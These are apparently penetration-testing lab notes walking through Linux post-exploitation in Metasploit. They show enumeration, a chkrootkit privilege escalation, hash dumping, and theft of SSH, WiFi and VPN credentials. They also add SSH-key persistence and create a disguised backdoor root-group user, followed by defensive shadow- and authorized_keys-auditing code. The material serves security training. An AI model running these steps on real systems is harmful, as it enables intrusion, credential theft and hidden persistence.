# Network Enumeration
netstat -antp
# if not working
ss -tnl
State   Recv-Q   Send-Q   Local Address:Port   Peer Address:Port
LISTEN  0        50       *:445                *:*
LISTEN  0        4096     127.0.0.11:39389     *:*
LISTEN  0        50       *:139                *:*
LISTEN  0        50       :::445               :::*
LISTEN  0        50       :::139               :::*
# List processes
ps aux
# Enumerate environment variables
env
Some Post Exploitation
Enumerate apps and services configuration files
exit
# if the session dies, open a new one
sessions -u 1
search enum_configs
use post/linux/gather/enum_configs
info
# Description:
# This module collects configuration files found on commonly installed
# applications and services, such as Apache, MySQL, Samba, Sendmail,
# etc. If a config file is found in its default path, the module will
# assume that is the file we want.
sessions
# Set the Meterpreter session
set SESSION 4
run
# It will not migrate if it's already an x64 process
loot
# Check the enumerated configuration files
Enumerate system environment variables
search env platform:linux
use post/multi/gather/env
info
# Description:
# This module prints out the operating system environment variables
sessions
set SESSION 3
run
Enumerate network information
search enum_network
use post/linux/gather/enum_network
info
# Description:
# This module gathers network information from the target system
# IPTables rules, interfaces, wireless information, open and listening
# ports, active network connections, DNS information and SSH
# information.
set SESSION 3
run
search enum_protections
use post/linux/gather/enum_protections
info
# Description:
# This module checks whether popular system hardening mechanisms are
# in place, such as SMEP, SMAP, SELinux, PaX and grsecurity. It also
# tries to find installed applications that can be used to hinder,
# prevent, or detect attacks, such as tripwire, snort, and apparmor.
# This module is meant to identify Linux Secure Modules (LSM) in
# addition to various antivirus, IDS/IPS, firewalls, sandboxes and
# other security related software.
set SESSION 3
run
notes
# check above information stored within the MSF db
Enumerate the system
search enum_system
use post/linux/gather/enum_system
info
# Description:
# This module gathers system information. We collect installed
# packages, installed services, mount information, user list, user
# bash history and cron jobs
set SESSION 3
run
loot
# Check the installed packages on the O.S.
cat /root/.msf4/loot/20230422105452_Linux_PostExp_192.215.55.3_linux.enum.syste_557868.txt
Check if the target is a VM or a container
search checkcontainer
use post/linux/gather/checkcontainer
# Description:
# This module attempts to determine whether the system is running
# inside of a container and if so, which one. This module supports
# detection of Docker, LXC, and systemd nspawn.
set SESSION 3
run
[+] This appears to be a 'Docker' container
📌 A Docker container can be exploited to break out of it and gain access to the host system.
Enumerate VM
search checkvm
use post/linux/gather/checkvm
set SESSION 3
run
# The target is not a VM
Enumerate users' history
search enum_users_history
use post/linux/gather/enum_users_history
# Description:
# This module gathers the following user-specific information: shell
# history, MySQL history, PostgreSQL history, MongoDB history, Vim
# history, lastlog, and sudoers.
set SESSION 3
run
# If this doesn't work, migrate to a "NT AUTHORITY\SYSTEM" user service
Background both the shell and the Meterpreter session with CTRL+Z
Privilege Escalation
The technique will depend on the version of the target Linux Kernel and the distribution version.
It is necessary to manually enumerate a program vulnerable to privilege escalation; in this case, Chkrootkit v0.49.
search chkrootkit
use exploit/unix/local/chkrootkit
info
# Description:
# Chkrootkit before 0.50 will run any executable file named
# /tmp/update as root, allowing a trivial privilege escalation.
# WfsDelay is set to 24h, since this is how often a chkrootkit scan is
# scheduled by default.
set CHKROOTKIT /bin/chkrootkit
set SESSION 2
set LHOST 192.15.244.2
sessions
# check the used ports
run
Upgrade the cmd/unix shell session to a Meterpreter session
sessions -u 1
sessions 2
getuid
Server username: uid=0, gid=0, euid=0, egid=0
# "root" user Meterpreter session
Linux user account hashes can be dumped using the privileged root user.
Terminate the shell session and background the meterpreter session.
Hashdump
📌 Linux password hashes are stored in the /etc/shadow file, accessible only by a user with root privileges.
On modern Linux systems the hashed passwords are stored in the /etc/shadow file, and the password field of /etc/passwd holds only the placeholder character x. /etc/passwd is readable by all users.
Linux user passphrases are hashed with the crypt function. The hashed passphrase follows a specific format: $id$salt$hashedpassword
The post/linux/gather/hashdump module needs to be run manually to dump the user account hashes and unshadow them.
A hash can be cracked (with John the Ripper) or stored for later use.
search hashdump
use post/linux/gather/hashdump
info
# Description:
# Post Module to dump the password hashes for all users on a Linux
# System
set SESSION 2
run
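As an added example (not part of the original notes or of the Metasploit module), the $id$salt$hashedpassword format above can be parsed to see which algorithm protects each account and which accounts are locked or have no password at all. The shadow lines and the id table are constructed samples; yescrypt and rounds= parameters land in the salt field.

```python
# Added example: parse crypt(3) strings from /etc/shadow-style entries.
# Input is a constructed sample, not a real dump.
CRYPT_IDS = {  # common Linux ids (assumption: not an exhaustive table)
    "1": "md5crypt",
    "5": "sha256crypt",
    "6": "sha512crypt",
    "y": "yescrypt",
}

SAMPLE_SHADOW = """\
root:$6$abcdefghijklmnop$QmFrZWRIYXNoVmFsdWVQbGFjZWhvbGRlcg:19469:0:99999:7:::
jackie:$y$j9T$saltsaltsaltsalt$YW5vdGhlckZha2VIYXNo:19469:0:99999:7:::
daemon:*:19400:0:99999:7:::
sshd:!:19400:0:99999:7:::
guest::19469:0:99999:7:::
ftp:$1$abcdefgh$ZmFrZW1kNWhhc2g:19469:0:99999:7:::
"""


def parse_crypt(value):
    """Split '$id$salt$hash' into (algorithm, salt, hash); None if not a hash.
    Parameter fields (yescrypt 'j9T', 'rounds=...') stay in the salt part."""
    if not value.startswith("$"):
        return None
    parts = value.split("$")
    if len(parts) < 4:
        return None
    algo = CRYPT_IDS.get(parts[1], "unknown(%s)" % parts[1])
    return algo, "$".join(parts[2:-1]), parts[-1]


def audit_shadow(text):
    """Return {user: algorithm | 'locked' | 'empty' | 'unknown'}."""
    result = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        user, pw = line.split(":")[:2]
        if pw == "":
            result[user] = "empty"        # login without a password
        elif pw.startswith(("!", "*")):
            result[user] = "locked"       # password login disabled
        else:
            parsed = parse_crypt(pw)
            result[user] = parsed[0] if parsed else "unknown"
    return result


def weak_accounts(text):
    """Accounts a defender should look at first: empty or legacy md5crypt."""
    return sorted(u for u, s in audit_shadow(text).items()
                  if s in ("empty", "md5crypt", "unknown"))
```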
Some Post Exploitation
Enumerate ssh directories
search ssh_creds
use post/multi/gather/ssh_creds
info
# Description:
# This module will collect the contents of all users' .ssh directories
# on the targeted machine. Additionally, known_hosts and
# authorized_keys and any other files are also downloaded. This module
# is largely based on firefox_creds.rb.
sessions
# Set the Meterpreter session
set SESSION 2
run
Enumerate users' .ecrypts directories
search ecryptfs_creds
use post/linux/gather/ecryptfs_creds
info
# Description:
# This module will collect the contents of all users' .ecrypts
# directories on the targeted machine. Collected "wrapped-passphrase"
# files can be cracked with John the Ripper (JtR) to recover "mount
# passphrases".
sessions
set SESSION 2
run
Enumerate WiFi credentials
search enum_psk
use post/linux/gather/enum_psk
info
# Description:
# This module collects 802-11-Wireless-Security credentials such as
# Access-Point name and Pre-Shared-Key from your target CLIENT Linux
# machine using /etc/NetworkManager/system-connections/ files. The
# module gathers NetworkManager's plaintext "psk" information.
set SESSION 2
run
Check for PPTP VPN chap-secrets credentials
search pptpd_chap_secrets
use post/linux/gather/pptpd_chap_secrets
info
# Description:
# This module collects PPTP VPN information such as client, server,
# password, and IP from your target server's chap-secrets file.
set SESSION 2
run
Perform SSH Persistence
search sshkey
use post/linux/manage/sshkey_persistence
info
# Description:
# This module will add an SSH key to a specified user (or all), to
# allow remote login via SSH at any time.
set SESSION 2
run
search ssh_login
use auxiliary/scanner/ssh/ssh_login
options
set USERNAME jackie
set PASSWORD password
run
sessions
Upgrade the cmd/unix shell session to a Meterpreter session
sessions -u 1
Privilege Escalation
search chkrootkit
use exploit/unix/local/chkrootkit
set CHKROOTKIT /bin/chkrootkit
set SESSION 2
set LHOST 192.101.97.2
run
# CTRL+Z to background the shell session
Upgrade the privileged session 3 to a Meterpreter session
sessions -u 3
sessions 4
Session 4 is a privileged Meterpreter session.
Persistence
Create a backdoor user with administrative privileges that can be used to access the target system via SSH
shell
whoami
root
cat /etc/passwd
# Create a user that looks like a service account
# and add it to "root group"
useradd -m ftp -s /bin/bash
passwd ftp
password123
usermod -aG root ftp
usermod -u 15 ftp
groups ftp
ftp : ftp root
❗ Changing a user's password is a strong indicator of compromise; it should not be done.
Perform SSH persistence with the Metasploit persistence module
exit # CTRL+C
background
search platform:linux persistence
use post/linux/manage/sshkey_persistence
info
# Description:
# This module will add an SSH key to a specified user (or all), to
# allow remote login via SSH at any time.
set SESSION 4
set CREATESSHFOLDER true
run
Access the private key, copy the content of the id_rsa file into a new file, and assign the appropriate permissions to that file.
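The artefact the sshkey_persistence module leaves behind is an extra line in a user's authorized_keys. As an added example (not the notes' or the module's code), the block below computes OpenSSH-style SHA256 fingerprints for every key in each user's file and reports those missing from an allowlist; the key blobs, the allowlist and the per-user file contents are constructed assumptions.

```python
# Added example: find authorized_keys entries whose fingerprint is not known.
import base64
import hashlib
import struct


def ed25519_blob(raw32):
    """OpenSSH wire encoding of an ed25519 public key (constructed sample)."""
    def s(b):
        return struct.pack(">I", len(b)) + b
    return base64.b64encode(s(b"ssh-ed25519") + s(raw32)).decode()


def fingerprint(b64blob):
    """'SHA256:<base64 without padding>' as printed by ssh-keygen -lf."""
    digest = hashlib.sha256(base64.b64decode(b64blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


KNOWN_BLOB = ed25519_blob(b"\x11" * 32)   # assumption: an approved key
ROGUE_BLOB = ed25519_blob(b"\x22" * 32)   # assumption: key added by the module
ALLOWLIST = {fingerprint(KNOWN_BLOB)}

# {user: authorized_keys contents}, constructed; the root entry mimics an
# unexpected key with no comment, the jackie file also has an options prefix
SAMPLE_AUTH_KEYS = {
    "jackie": 'ssh-ed25519 %s jackie@laptop\nfrom="10.0.0.5" ssh-ed25519 %s backup\n'
              % (KNOWN_BLOB, KNOWN_BLOB),
    "root": "ssh-ed25519 %s\n" % ROGUE_BLOB,
}


def parse_authorized_keys(text):
    """Yield (keytype, blob, comment); skips blanks, comments, option prefixes."""
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        # options such as from="..." precede the key type (simplified tokenizer)
        while parts and not parts[0].startswith(("ssh-", "ecdsa-", "sk-")):
            parts.pop(0)
        if len(parts) >= 2:
            yield parts[0], parts[1], " ".join(parts[2:])


def unknown_keys(auth_keys_by_user, allowlist):
    """Return [(user, fingerprint, comment)] for keys not in the allowlist."""
    return [(user, fingerprint(blob), comment)
            for user, text in auth_keys_by_user.items()
            for _, blob, comment in parse_authorized_keys(text)
            if fingerprint(blob) not in allowlist]
```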